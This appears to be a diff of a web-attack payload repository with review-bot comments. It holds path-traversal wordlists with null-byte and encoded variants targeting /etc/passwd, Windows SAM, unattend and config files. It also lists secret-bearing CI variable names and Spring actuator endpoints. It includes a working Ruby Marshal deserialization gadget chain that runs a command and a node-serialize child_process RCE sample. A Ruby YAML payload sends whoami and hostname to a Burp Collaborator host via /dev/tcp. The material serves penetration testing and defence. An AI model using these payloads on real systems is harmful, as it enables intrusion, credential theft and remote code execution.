/usr/local/apps/apache2/conf/httpd.conf%00
/usr/local/apps/apache/conf/httpd.conf%00
/etc/apache/conf/httpd.conf%00
/etc/apache2/conf/httpd.conf%00
/etc/httpd/conf/httpd.conf%00
/etc/http/conf/httpd.conf%00
/etc/apache2/httpd.conf%00
/etc/httpd/httpd.conf%00
/etc/http/httpd.conf%00
/etc/httpd.conf%00
/opt/apache/conf/httpd.conf%00
/opt/apache2/conf/httpd.conf%00
/var/www/conf/httpd.conf%00
/private/etc/httpd/httpd.conf%00
/private/etc/httpd/httpd.conf.default%00
/Volumes/webBackup/opt/apache2/conf/httpd.conf%00
/Volumes/webBackup/private/etc/httpd/httpd.conf%00
/Volumes/webBackup/private/etc/httpd/httpd.conf.default%00
/Program Files\Apache Group\Apache\conf\httpd.conf%00
/Program Files\Apache Group\Apache2\conf\httpd.conf%00
/Program Files\xampp\apache\conf\httpd.conf%00
/usr/local/php/httpd.conf.php%00
/usr/local/php4/httpd.conf.php%00
/usr/local/php5/httpd.conf.php%00
/usr/local/php/httpd.conf%00
/usr/local/php4/httpd.conf%00
/usr/local/php5/httpd.conf%00
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf%00
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf%00
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf%00
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php%00
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php%00
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php%00
/usr/local/etc/apache/vhosts.conf%00
/etc/php.ini%00
/bin/php.ini%00
/etc/httpd/php.ini%00
/usr/lib/php.ini%00
/usr/lib/php/php.ini%00
/usr/local/etc/php.ini%00
/usr/local/lib/php.ini%00
/usr/local/php/lib/php.ini%00
/usr/local/php4/lib/php.ini%00
/usr/local/php5/lib/php.ini%00
/usr/local/apache/conf/php.ini%00
/etc/php4.4/fcgi/php.ini%00
/etc/php4/apache/php.ini%00
/etc/php4/apache2/php.ini%00
/etc/php5/apache/php.ini%00
/etc/php5/apache2/php.ini%00
/etc/php/php.ini%00
/etc/php/php4/php.ini%00
/etc/php/apache/php.ini%00
/etc/php/apache2/php.ini%00
/web/conf/php.ini%00
/usr/local/Zend/etc/php.ini%00
/opt/xampp/etc/php.ini%00
/var/local/www/conf/php.ini%00
/etc/php/cgi/php.ini%00
/etc/php4/cgi/php.ini%00
/etc/php5/cgi/php.ini%00
/php5\php.ini%00
/php4\php.ini%00
/php\php.ini%00
/PHP\php.ini%00
/WINDOWS\php.ini%00
/WINNT\php.ini%00
/apache\php\php.ini%00
/xampp\apache\bin\php.ini%00
/NetServer\bin\stable\apache\php.ini%00
/home2\bin\stable\apache\php.ini%00
/home\bin\stable\apache\php.ini%00
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini%00
/usr/local/cpanel/logs%00
/usr/local/cpanel/logs/stats_log%00
/usr/local/cpanel/logs/access_log%00
/usr/local/cpanel/logs/error_log%00
/usr/local/cpanel/logs/license_log%00
/usr/local/cpanel/logs/login_log%00
/usr/local/cpanel/logs/stats_log%00
/var/cpanel/cpanel.config%00
/var/log/mysql/mysql-bin.log%00
/var/log/mysql.log%00
/var/log/mysqlderror.log%00
/var/log/mysql/mysql.log%00
/var/log/mysql/mysql-slow.log%00
/var/mysql.log%00
/var/lib/mysql/my.cnf%00
/etc/mysql/my.cnf%00
/etc/my.cnf%00
/etc/logrotate.d/proftpd%00
/www/logs/proftpd.system.log%00
/var/log/proftpd%00
/etc/proftp.conf%00
/etc/protpd/proftpd.conf%00
/etc/vhcs2/proftpd/proftpd.conf%00
/etc/proftpd/modules.conf%00
/var/log/vsftpd.log%00
/etc/vsftpd.chroot_list%00
/etc/logrotate.d/vsftpd.log%00
/etc/vsftpd/vsftpd.conf%00
/etc/vsftpd.conf%00
/etc/chrootUsers%00
/var/log/xferlog%00
/var/adm/log/xferlog%00
/etc/wu-ftpd/ftpaccess%00
/etc/wu-ftpd/ftphosts%00
/etc/wu-ftpd/ftpusers%00
/usr/sbin/pure-config.pl%00
/usr/etc/pure-ftpd.conf%00
/etc/pure-ftpd/pure-ftpd.conf%00
/usr/local/etc/pure-ftpd.conf%00
/usr/local/etc/pureftpd.pdb%00
/usr/local/pureftpd/etc/pureftpd.pdb%00
/usr/local/pureftpd/sbin/pure-config.pl%00
/usr/local/pureftpd/etc/pure-ftpd.conf%00
/etc/pure-ftpd.conf%00
/etc/pure-ftpd/pure-ftpd.pdb%00
/etc/pureftpd.pdb%00
/etc/pureftpd.passwd%00
/etc/pure-ftpd/pureftpd.pdb%00
/usr/ports/ftp/pure-ftpd/%00
/usr/ports/net/pure-ftpd/%00
/usr/pkgsrc/net/pureftpd/%00
/usr/ports/contrib/pure-ftpd/%00
/var/log/pure-ftpd/pure-ftpd.log%00
/logs/pure-ftpd.log%00
/var/log/pureftpd.log%00
/var/log/ftp-proxy/ftp-proxy.log%00
/var/log/ftp-proxy%00
/var/log/ftplog%00
/etc/logrotate.d/ftp%00
/etc/ftpchroot%00
/etc/ftphosts%00
/var/log/exim_mainlog%00
/var/log/exim/mainlog%00
/var/log/maillog%00
/var/log/exim_paniclog%00
/var/log/exim/paniclog%00
/var/log/exim/rejectlog%00
/var/log/exim_rejectlog%00


@ -0,0 +1,8 @@
/etc/apache2/httpd.conf
/Library/WebServer/Documents/index.html
/private/var/log/appstore.log
/var/log/apache2/error_log
/var/log/apache2/access_log
/usr/local/nginx/conf/nginx.conf
/var/log/nginx/error_log
/var/log/nginx/access_log

File diff suppressed because one or more lines are too long


@ -0,0 +1,14 @@
/robots.txt
/humans.txt
/style.css
/configuration.php
wp-login.php
wp-admin.php
/wp-content/plugins
/include/config.php
/inc/config.php
/include/mysql.php
/inc/mysql.php
/sites/defaults/settings.php
/phpmyadmin/changelog.php
web.config
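Review bot: `/sites/defaults/settings.php` looks like a typo for Drupal's `sites/default/settings.php`, so as written the entry would not match the file it is presumably meant to cover; I would change it to `/sites/default/settings.php`. `wp-admin.php` is also doubtful, since a stock WordPress install has a `wp-admin/` directory rather than a file of that name. The list mixes rooted and bare entries (`wp-login.php`, `wp-admin.php` and `web.config` have no leading `/` while the other eleven do), which gives inconsistent results whether the list is joined to a base URL or reused as a match list over request logs; pick one convention.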


@ -0,0 +1,212 @@
C:/$recycle.bin/s-1-5-18/desktop.ini
C:/apache2/log/access.log
C:/apache2/log/access_log
C:/apache2/log/error.log
C:/apache2/log/error_log
C:/apache2/logs/access.log
C:/apache2/logs/access_log
C:/apache2/logs/error.log
C:/apache2/logs/error_log
C:/apache/log/access.log
C:/apache/log/access_log
C:/apache/log/error.log
C:/apache/log/error_log
C:/apache/logs/access.log
C:/apache/logs/access_log
C:\apache\logs\access.log
C:/apache/logs/error.log
C:/apache/logs/error_log
C:\apache\logs\error.log
C:/apache/php/php.ini
C:/boot.ini
C:\boot.ini
C:/documents and settings/administrator/desktop/desktop.ini
C:/documents and settings/administrator/ntuser.dat
C:/documents and settings/administrator/ntuser.ini
C:/home2/bin/stable/apache/php.ini
C:/home/bin/stable/apache/php.ini
C:/inetpub/logs/logfiles
C:/inetpub/wwwroot/global.asa
C:/inetpub/wwwroot/index.asp
C:/inetpub/wwwroot/web.config
C:/log/access.log
C:/log/access_log
C:/log/error.log
C:/log/error_log
C:/log/httpd/access_log
C:/log/httpd/error_log
C:/logs/access.log
C:/logs/access_log
C:/logs/error.log
C:/logs/error_log
C:/logs/httpd/access_log
C:/logs/httpd/error_log
C:/MININT/SMSOSD/OSDLOGS/VARIABLES.DAT
C:/mysql/bin/my.ini
C:/mysql/data/hostname.err
C:/mysql/data/mysql.err
C:/mysql/data/mysql.log
C:/mysql/my.cnf
C:/mysql/my.ini
C:\nginx-1.7.4\conf\nginx.conf
C:\nginx-1.7.4\nginx.conf
C:/opt/xampp/logs/access.log
C:/opt/xampp/logs/access_log
C:/opt/xampp/logs/error.log
C:/opt/xampp/logs/error_log
C:/php4/php.ini
C:/php4/sessions/
C:/php5/php.ini
C:/php5/sessions/
C:/php/php.ini
C:/php/sessions/
C:/program files/apache group/apache2/conf/httpd.conf
C:/program files/apachegroup/apache2/conf/httpd.conf
C:/programfiles/apachegroup/apache2/conf/httpd.conf
C:/program files/apache group/apache/conf/httpd.conf
C:/program files/apachegroup/apache/conf/httpd.conf
C:/programfiles/apachegroup/apache/conf/httpd.conf
C:/program files/apache group/apache/logs/access.log
C:/program files/apache group/apache/logs/error.log
C:\Program Files\Apache Software Foundation\Apache2.2\conf\httpd.conf
C:\Program Files\Apache Software Foundation\Apache2.2\logs\access.log
C:\Program Files\Apache Software Foundation\Apache2.2\logs\error.log
C:/program files/filezilla server/filezilla server.xml
C:/program files/mysql/data/hostname.err
C:/program files/mysql/data/mysql-bin.log
C:/program files/mysql/data/mysql.err
C:/program files/mysql/data/mysql.log
C:/program files/mysql/my.cnf
C:/program files/mysql/my.ini
C:/program files/mysql/mysql server 5.0/data/hostname.err
C:/program files/mysql/mysql server 5.0/data/mysql-bin.log
C:/program files/mysql/mysql server 5.0/data/mysql.err
C:/program files/mysql/mysql server 5.0/data/mysql.log
C:/program files/mysql/mysql server 5.0/my.cnf
C:/program files/mysql/mysql server 5.0/my.ini
C:/program files/mysql/mysql server 5.1/my.ini
C:/program files (x86)/apache group/apache2/conf/httpd.conf
C:/program files (x86)/apache group/apache/conf/access.log
C:/program files (x86)/apache group/apache/conf/error.log
C:/program files (x86)/apache group/apache/conf/httpd.conf
C:/program files (x86)/filezilla server/filezilla server.xml
C:/program files (x86)/xampp/apache/conf/httpd.conf
C:/program files/xampp/apache/conf/httpd.conf
C:/programfiles/xampp/apache/conf/httpd.conf
C:/program files/xampp/apache/conf/httpd.confetc/passwd
C:/sysprep.inf
C:/sysprep/sysprep.inf
C:/sysprep/sysprep.xml
C:/sysprep.xml
C:/system32/inetsrv/metabase.xml
C:/system volume information/wpsettings.dat
C:/unattended.txt
C:/unattended.xml
C:/unattend.txt
C:/unattend.xml
C:/users/administrator/desktop/desktop.ini
C:/users/administrator/ntuser.dat
C:/users/administrator/ntuser.ini
C:\wamp\apache2\logs\access.log
C:\wamp\apache2\logs\access_log
C:\wamp\apache2\logs\error.log
C:\wamp\apache2\logs\error_log
C:\wamp\logs\access.log
C:\wamp\logs\access_log
C:\wamp\logs\error.log
C:\wamp\logs\error_log
C:/windows/csc/v2.0.6/pq
C:/windows/csc/v2.0.6/sm
C:/windows/debug/netsetup.log
C:/windows/explorer.exe
C:/windows/iis6.log
C:/windows/iis6.log (5,6 or 7)
C:/windows/iis7.log
C:/windows/iis8.log
C:/windows/notepad.exe
C:/windows/panther/setupinfo
C:/windows/panther/setupinfo.bak
C:/windows/panther/sysprep.inf
C:/windows/panther/sysprep.xml
C:/windows/panther/unattended.txt
C:/windows/panther/unattended.xml
C:/windows/panther/unattend/setupinfo
C:/windows/panther/unattend/setupinfo.bak
C:/windows/panther/unattend/sysprep.inf
C:/windows/panther/unattend/sysprep.xml
C:/windows/panther/unattend.txt
C:/windows/panther/unattend/unattended.txt
C:/windows/panther/unattend/unattended.xml
C:/windows/panther/unattend/unattend.txt
C:/windows/panther/unattend/unattend.xml
C:/windows/panther/unattend.xml
C:/windows/php.ini
C:/windows/repair/sam
C:/windows/repair/security
C:/windows/repair/software
C:/windows/repair/system
C:/windows/system32/config/appevent.evt
C:/windows/system32/config/default.sav
C:/windows/system32/config/regback/default
C:/windows/system32/config/regback/sam
C:/windows/system32/config/regback/security
C:/windows/system32/config/regback/software
C:/windows/system32/config/regback/system
C:/windows/system32/config/sam
C:/windows/system32/config/secevent.evt
C:/windows/system32/config/security.sav
C:/windows/system32/config/software.sav
C:/windows/system32/config/system
C:/windows/system32/config/system.sa
C:/windows/system32/config/system.sav
C:/windows/system32/drivers/etc/hosts
C:/windows/system32/eula.txt
C:/windows/system32/inetsrv/config/applicationhost.config
C:/windows/system32/inetsrv/config/schema/aspnet_schema.xml
C:/windows/system32/license.rtf
C:/windows/system32/logfiles/httperr/httperr1.log
C:/windows/system32/sysprep.inf
C:/windows/system32/sysprepsysprep.inf
C:/windows/system32/sysprep/sysprep.xml
C:/windows/system32/sysprepsysprep.xml
C:/windows/system32/sysprepunattended.txt
C:/windows/system32/sysprepunattended.xml
C:/windows/system32/sysprepunattend.txt
C:/windows/system32/sysprepunattend.xml
C:/windows/system32/sysprep.xml
C:/windows/system32/unattended.txt
C:/windows/system32/unattended.xml
C:/windows/system32/unattend.txt
C:/windows/system32/unattend.xml
C:/windows/system.ini
C:/windows/temp/
C:/windows/windowsupdate.log
C:/windows/win.ini
C:/winnt/php.ini
C:/winnt/win.ini
C:/xampp/apache/bin/php.ini
C:/xampp/apache/conf/httpd.conf
C:/xampp/apache/logs/access.log
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\access_log
C:/xampp/apache/logs/error.log
C:\xampp\apache\logs\error.log
C:\xampp\apache\logs\error_log
C:/xampp/filezillaftp/filezilla server.xml
C:/xampp/filezillaftp/logs
C:/xampp/filezillaftp/logs/access.log
C:/xampp/filezillaftp/logs/error.log
C:/xampp/mercurymail/logs/access.log
C:/xampp/mercurymail/logs/error.log
C:/xampp/mercurymail/mercury.ini
C:/xampp/mysql/data/mysql.err
C:/xampp/phpmyadmin/config.inc
C:/xampp/phpmyadmin/config.inc.php
C:/xampp/phpmyadmin/phpinfo.php
C:/xampp/php/php.ini
C:/xampp/sendmail/sendmail.ini
C:/xampp/sendmail/sendmail.log
C:/xampp/tomcat/conf/tomcat-users.xml
C:/xampp/tomcat/conf/web.xml
C:/xampp/webalizer/webalizer.conf
C:/xampp/webdav/webdav.txt
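Review bot: Several entries are malformed and cannot match a real path: `C:/program files/xampp/apache/conf/httpd.confetc/passwd` has `etc/passwd` fused onto it, `C:/windows/iis6.log (5,6 or 7)` carries an inline annotation, and the six `C:/windows/system32/sysprepsysprep.*` / `sysprepunattend*` lines are missing the `/` after `sysprep` (compare `C:/windows/system32/sysprep/sysprep.xml`, which sits among them). `C:/windows/system32/config/system.sa` next to `system.sav` looks truncated as well. Anyone reusing the list, for testing or as a match list for path-traversal detection on request logs, carries these dead entries; I would drop the fused and annotated lines and restore the separator, e.g. `C:/windows/system32/sysprep/sysprep.inf`. The list also gives the `C:\` form for only some of the paths it lists with `C:/`, which is worth making consistent.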

File diff suppressed because one or more lines are too long


@ -0,0 +1,10 @@
etc/passwd
etc/passwd%00
etc%2fpasswd
etc%2fpasswd%00
etc%5cpasswd
etc%5cpasswd%00
etc%c0%afpasswd
etc%c0%afpasswd%00
C:\boot.ini
C:\WINDOWS\win.ini

6919
File Inclusion/index.html Normal file

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

Binary file not shown.


6470
GraphQL Injection/index.html Normal file

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

5887
Hidden Parameters/index.html Normal file

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long


@ -0,0 +1,66 @@
#!/usr/bin/env ruby
class Gem::StubSpecification
def initialize; end
end
stub_specification = Gem::StubSpecification.new
stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2")
puts "STEP n"
stub_specification.name rescue nil
puts
class Gem::Source::SpecificFile
def initialize; end
end
specific_file = Gem::Source::SpecificFile.new
specific_file.instance_variable_set(:@spec, stub_specification)
other_specific_file = Gem::Source::SpecificFile.new
puts "STEP n-1"
specific_file <=> other_specific_file rescue nil
puts
$dependency_list= Gem::DependencyList.new
$dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file])
puts "STEP n-2"
$dependency_list.each{} rescue nil
puts
class Gem::Requirement
def marshal_dump
[$dependency_list]
end
end
payload = Marshal.dump(Gem::Requirement.new)
puts "STEP n-3"
Marshal.load(payload) rescue nil
puts
puts "VALIDATION (in fresh ruby process):"
IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe|
pipe.print payload
pipe.close_write
puts pipe.gets
puts
end
puts "Payload (hex):"
puts payload.unpack('H*')[0]
puts
require "base64"
puts "Payload (Base64 encoded):"
puts Base64.encode64(payload)
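Review bot: Every stage is wrapped in `rescue nil`, so a run on a runtime where the chain no longer works prints the same `STEP n` … `STEP n-3` headings as a run where it does, and only the command's stderr output tells them apart. The file has no header comment saying what it produces or which Ruby/RubyGems versions it was checked against; I would add one, plus a line such as `# each STEP below runs the command stored in @loaded_from on the local machine`, since that side effect is not obvious from the code (this reading of the STEP calls is inferred from the `"|id 1>&2"` value and is not shown on the page). `require "base64"` belongs at the top of the file rather than between two `puts` blocks. The sink exercised throughout is `Marshal.load`; a comment naming it would make the file more useful to someone auditing their own code for that call.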


@ -0,0 +1,5 @@
var y = {
rce : function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });},
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));
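Review bot: The file stops at `serialize.serialize(y)` and has no comment explaining that the printed string carries the function's source as text, which is what makes a later `unserialize()` of externally supplied data the dangerous call. A one-line comment such as `// output embeds the function body as text; the sink is unserialize() on untrusted input` would make the listing self-explanatory for someone auditing for that call. The object literal has a trailing comma and no terminating semicolon, and the `exec` callback ignores `error` and `stderr`, so a failed command prints an empty line with no indication why.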


@ -0,0 +1,19 @@
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: "bash -c 'echo 1 > /dev/tcp/`whoami`.`hostname`.wkkib01k9lsnq9qm2pogo10tmksagz.burpcollaborator.net/443'"
method_id: :resolve
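Review bot: `git_set` hard-codes one specific `burpcollaborator.net` subdomain, so anyone who runs this file unchanged in a test sends the tested host's `whoami` and `hostname` output to an out-of-band endpoint they do not control. The value should be an obvious placeholder, e.g. `git_set: "<command under test>"`, with a comment saying the tester substitutes a callback host of their own. The rendered section shows no indentation, so the nesting of `io` / `debug_output` / `socket` cannot be confirmed from this page; if the committed file is also flat it will not parse as the nested object graph the keys imply.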

Binary file not shown.


File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

Binary file not shown.


File diff suppressed because one or more lines are too long


@ -0,0 +1,52 @@
auditevents
autoconfig
beans
caches
conditions
configprops
dump
env
flyway
health
heapdump
httptrace
info
integrationgraph
jolokia
logfile
loggers
liquibase
metrics
mappings
prometheus
scheduledtasks
sessions
shutdown
threaddump
trace
actuator/auditevents
actuator/autoconfig
actuator/beans
actuator/caches
actuator/conditions
actuator/configprops
actuator/dump
actuator/env
actuator/flyway
actuator/health
actuator/heapdump
actuator/httptrace
actuator/info
actuator/integrationgraph
actuator/jolokia
actuator/logfile
actuator/loggers
actuator/liquibase
actuator/metrics
actuator/mappings
actuator/prometheus
actuator/scheduledtasks
actuator/sessions
actuator/shutdown
actuator/threaddump
actuator/trace

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long


@ -0,0 +1,1401 @@
GITHUB_TOKEN=
PATH=
CODECLIMATE_REPO_TOKEN=
DOCKER_PASSWORD=
NPM_TOKEN=
GH_TOKEN=
encrypted_02ddd67d5586_iv=
encrypted_517c5824cb79_key=
encrypted_02ddd67d5586_key=
encrypted_517c5824cb79_iv=
encrypted_1366e420413c_key=
encrypted_1366e420413c_iv=
DOCKER_USERNAME=
ARTIFACTS_SECRET=
ARTIFACTS_KEY=
SURGE_TOKEN=
SURGE_LOGIN=
ARTIFACTS_BUCKET=
SAUCE_ACCESS_KEY=
SAUCE_USERNAME=
DB_USER=
DB_PORT=
DB_HOST=
DBP=
javascriptEnabled=
acceptSslCerts=
AWS_ACCESS_KEY_ID=
AWS_SECRET_ACCESS_KEY=
DOCKER_EMAIL=
GH_USER_EMAIL=
GH_USER_NAME=
CLOUDINARY_URL=
COVERALLS_REPO_TOKEN=
CF_PASSWORD=
CF_SPACE=
CF_USERNAME=
CF_ORGANIZATION=
WPT_REPORT_API_KEY=
USABILLA_ID=
encrypted_17b59ce72ad7_key=
encrypted_17b59ce72ad7_iv=
NGROK_TOKEN=
rotatable=
CLOUDINARY_URL_STAGING=
encrypted_2c8d10c8cc1d_key=
encrypted_2c8d10c8cc1d_iv=
SRCCLR_API_TOKEN=
NPM_AUTH_TOKEN=
takesScreenshot=
GH_UNSTABLE_OAUTH_CLIENT_SECRET=
GH_OAUTH_CLIENT_SECRET=
GH_NEXT_UNSTABLE_OAUTH_CLIENT_SECRET=
GH_UNSTABLE_OAUTH_CLIENT_ID=
GH_OAUTH_CLIENT_ID=
GH_NEXT_OAUTH_CLIENT_ID=
GH_NEXT_UNSTABLE_OAUTH_CLIENT_ID=
GH_NEXT_OAUTH_CLIENT_SECRET=
marionette=
NPM_CONFIG_AUDIT=
FTP_PW=
FTP_LOGIN=
NPM_CONFIG_STRICT_SSL=
--ignore-ssl-errors=
TRAVIS_SECURE_ENV_VARS=
FOSSA_API_KEY=
VIP_GITHUB_DEPLOY_KEY=
SIGNING_KEY_SID=
SIGNING_KEY_SECRET=
ACCOUNT_SID=
API_KEY_SID=
API_KEY_SECRET=
CI_DEPLOY_PASSWORD=
CONFIGURATION_PROFILE_SID_SFU=
CONFIGURATION_PROFILE_SID_P2P=
ANACONDA_TOKEN=
CC_TEST_REPORTER_ID=
OS_TENANT_NAME=
OS_TENANT_ID=
OS_PROJECT_NAME=
OS_AUTH_URL=
OS_USERNAME=
OS_PASSWORD=
OS_REGION_NAME=
node_pre_gyp_secretAccessKey=
node_pre_gyp_accessKeyId=
encrypted_a2e547bcd39e_key=
encrypted_a2e547bcd39e_iv=
encrypted_17cf396fcb4f_key=
encrypted_17cf396fcb4f_iv=
datadog_api_key=
accessibilityChecks=
acceptInsecureCerts=
CI_DEPLOY_USERNAME=
cssSelectorsEnabled=
SONATYPE_PASSWORD=
tester_keys_password=
GITHUB_OAUTH_TOKEN=
webStorageEnabled=
locationContextEnabled=
nativeEvents=
handlesAlerts=
databaseEnabled=
browserConnectionEnabled=
applicationCacheEnabled=
hasTouchScreen=
takesHeapSnapshot=
networkConnectionEnabled=
mobileEmulationEnabled=
scope=
ALGOLIA_API_KEY=
encrypted_e05f6ccc270e_key=
encrypted_e05f6ccc270e_iv=
DANGER_GITHUB_API_TOKEN=
PYPI_PASSWORD=
VIP_GITHUB_BUILD_REPO_DEPLOY_KEY=
SSMTP_CONFIG=
COVERITY_SCAN_TOKEN=
CODECOV_TOKEN=
SIGNING_KEY=
GPG_ENCRYPTION=
NEW_RELIC_BETA_TOKEN=
ALGOLIA_APPLICATION_ID=
PACKAGECLOUD_TOKEN=
takesElementScreenshot=
raisesAccessibilityExceptions=
DOCKER_USER=
datadog_app_key=
encrypted_cb02be967bc8_key=
encrypted_cb02be967bc8_iv=
MAPBOX_ACCESS_TOKEN=
GITHUB_DEPLOYMENT_TOKEN=
ROPSTEN_PRIVATE_KEY=
RINKEBY_PRIVATE_KEY=
KOVAN_PRIVATE_KEY=
bintrayUser=
sonatypeUsername=
sonatypePassword=
bintrayKey=
SECRET_1=
SECRET_0=
SECRET_9=
SECRET_8=
SECRET_7=
SECRET_6=
SECRET_5=
SECRET_4=
SECRET_3=
SECRET_2=
SECRET_11=
SECRET_10=
TRAVIS_COM_TOKEN=
AWS_DEFAULT_REGION=
GITHUB_ACCESS_TOKEN=
PYPI_USERNAME=
BINTRAY_APIKEY=
BUNDLE_ZDREPO__JFROG__IO=
COCOAPODS_TRUNK_TOKEN=
OCTEST_SERVER_BASE_URL=
OCTEST_APP_USERNAME=
OCTEST_APP_PASSWORD=
OKTA_CLIENT_TOKEN=
HEROKU_API_KEY=
DATABASE_PASSWORD=
encrypted_0d22c88004c9_key=
encrypted_0d22c88004c9_iv=
BUNDLESIZE_GITHUB_TOKEN=
IOS_DOCS_DEPLOY_TOKEN=
COVERALLS_TOKEN=
CLOUDINARY_URL_EU=
HEROKU_API_USER=
OKTA_CLIENT_ORGURL=
VIRUSTOTAL_APIKEY=
PUSHOVER_USER=
PUSHOVER_TOKEN=
HB_CODESIGN_KEY_PASS=
HB_CODESIGN_GPG_PASS=
isbooleanGood=
BROWSER_STACK_USERNAME=
BROWSER_STACK_ACCESS_KEY=
SNYK_TOKEN=
rTwPXE9XlKoTn9FTWnAqF3MuWaLslDcDKYEh7OaYJjF01piu6g4Nc=
lr7mO294=
NtkUXxwH10BDMF7FMVlQ4zdHQvyZ0=
AURORA_STRING_URL=
TREX_OKTA_CLIENT_TOKEN=
TREX_OKTA_CLIENT_ORGURL=
GPG_PASSPHRASE=
encrypted_5d419efedfca_key=
encrypted_5d419efedfca_iv=
ACCESS_KEY_SECRET=
ACCESS_KEY_ID=
props.disabled=
ALGOLIA_API_KEY_MCM=
BINTRAY_API_KEY=
DOCKER_PASS=
TRIGGER_API_COVERAGE_REPORTER=
FIREBASE_TOKEN=
OSSRH_USERNAME=
7QHkRyCbP98Yv2FTXrJFcx9isA2viFx2UxzTsvXcAKHbCSAw=
dockerhubUsername=
dockerhubPassword=
SECRET_KEY_BASE=
repoToken=
encrypted_28c9974aabb6_key=
encrypted_28c9974aabb6_iv=
SONATYPE_USERNAME=
NGROK_AUTH_TOKEN=
FI2_SIGNING_SEED=
FI2_RECEIVING_SEED=
FI1_SIGNING_SEED=
FI1_RECEIVING_SEED=
CONTENTFUL_ORGANIZATION=
CONTENTFUL_ACCESS_TOKEN=
ANSIBLE_VAULT_PASSWORD=
FIREBASE_PROJECT=
ALGOLIA_SEARCH_API_KEY=
BINTRAY_USER=
encrypted_fb9a491fd14b_key=
encrypted_fb9a491fd14b_iv=
CODACY_PROJECT_TOKEN=
MANAGEMENT_TOKEN=
CONFIGURATION_PROFILE_SID=
NOW_TOKEN=
encrypted_90a9ca14a0f9_key=
encrypted_90a9ca14a0f9_iv=
IJ_REPO_USERNAME=
IJ_REPO_PASSWORD=
GITHUB_KEY=
pLytpSCciF6t9NqqGZYbBomXJLaG84=
encrypted_8a915ebdd931_key=
encrypted_8a915ebdd931_iv=
encrypted_0fb9444d0374_key=
encrypted_0fb9444d0374_iv=
encrypted_b98964ef663e_key=
encrypted_b98964ef663e_iv=
encrypted_50ea30db3e15_key=
encrypted_50ea30db3e15_iv=
SONAR_TOKEN=
API_KEY=
encrypted_a47108099c00_key=
encrypted_a47108099c00_iv=
OSSRH_SECRET=
GH_API_KEY=
PROJECT_CONFIG=
encrypted_f19708b15817_key=
encrypted_f19708b15817_iv=
encrypted_568b95f14ac3_key=
encrypted_568b95f14ac3_iv=
encrypted_4664aa7e5e58_key=
encrypted_4664aa7e5e58_iv=
ORG_GRADLE_PROJECT_SONATYPE_NEXUS_USERNAME=
ORG_GRADLE_PROJECT_SONATYPE_NEXUS_PASSWORD=
encrypted_54c63c7beddf_key=
encrypted_54c63c7beddf_iv=
CONTENTFUL_INTEGRATION_SOURCE_SPACE=
CONTENTFUL_INTEGRATION_MANAGEMENT_TOKEN=
BLUEMIX_API_KEY=
UzhH1VoXksrNQkFfc78sGxD0VzLygdDJ7RmkZPeBiHfX1yilToi1yrlRzRDLo46LvSEEiawhTa1i9W3UGr3p4LNxOxJr9tR9AjUuIlP21VEooikAhRf35qK0=
ALGOLIA_APP_ID_MCM=
MAILGUN_PUB_KEY=
MAILGUN_PRIV_KEY=
MAILGUN_DOMAIN=
ALGOLIA_APPLICATION_ID_MCM=
encrypted_1528c3c2cafd_key=
encrypted_1528c3c2cafd_iv=
CASPERJS_TIMEOUT=
COS_SECRETS=
ATOKEN=
PASSWORD=
GITHUB_DEPLOY_HB_DOC_PASS=
COVERITY_SCAN_NOTIFICATION_EMAIL=
CONTENTFUL_CMA_TEST_TOKEN=
DOCKER=
5oLiNgoXIh3jFmLkXfGabI4MvsClZb72onKlJs8WD7VkusgVOrcReD1vkAMv7caaO4TqkMAAuShXiks2oFI5lpHSz0AE1BaI1s6YvwHQFlxbSQJprJd4eeWS9l78mYPJhoLRaWbvf0qIJ29mDSAgAJ7XI=
Q67fq4bD04RMM2RJAS6OOYaBF1skYeJCblwUk=
COVERALLS_API_TOKEN=
MapboxAccessToken=
FIREBASE_API_TOKEN=
TWINE_PASSWORD=
0dysAuQ5KQk=
USERNAME=
encrypted_91ee6a0187b8_key=
encrypted_91ee6a0187b8_iv=
OSSRH_PASS=
OSSRH_USER=
setWindowRect=
SCRUTINIZER_TOKEN=
CLUSTER_NAME=
OC_PASS=
APP_NAME=
GITHUB_API_KEY=
COCOAPODS_TRUNK_EMAIL=
ORG_ID=
OSSRH_JIRA_USERNAME=
OSSRH_JIRA_PASSWORD=
DH_END_POINT_1=
CI_DEPLOY_USER=
CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN=
WEBHOOK_URL=
SLACK_CHANNEL=
APIARY_API_KEY=
=
SONATYPE_USER=
TWINE_USERNAME=
WPJM_PHPUNIT_GOOGLE_GEOCODE_API_KEY=
SONAR_ORGANIZATION_KEY=
DEPLOY_USER=
SONAR_PROJECT_KEY=
ZZiigPX7RCjq5XHbzUpPpMbC8MFxT2K3jcFXUitfwZvNaZXJIiK3ZQJU4ayKaegLvI91x1SqH0=
encrypted_2620db1da8a0_key=
encrypted_2620db1da8a0_iv=
CLIENT_ID=
AWS_REGION=
AWS_S3_BUCKET=
encrypted_2fb4f9166ccf_key=
encrypted_2fb4f9166ccf_iv=
